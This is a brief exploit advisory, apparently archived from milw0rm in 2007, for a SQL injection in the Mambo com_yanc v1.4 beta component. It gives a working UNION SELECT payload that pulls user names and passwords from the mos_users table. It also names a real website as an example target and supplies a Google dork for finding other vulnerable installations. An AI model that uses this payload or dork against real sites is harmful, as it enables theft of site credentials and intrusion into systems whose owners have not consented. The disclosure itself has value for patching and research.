------------------------------ ------------------------------- Mambo com_yanc v1.4 beta (id) Blind Remote SQL Injection Vuln ------------------------------------------------------------- Bulan: Cyber-Security ------------------------------------------------------------- Exploit: index.php?option=com_yanc&Itemid=9999999&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/* Example:http://www.tnrb.net/ ------------------------------------------------------------- google dork: inurl:index.php?option=com_yanc ------------------------------------------------------------- # milw0rm.com [2007-05-17]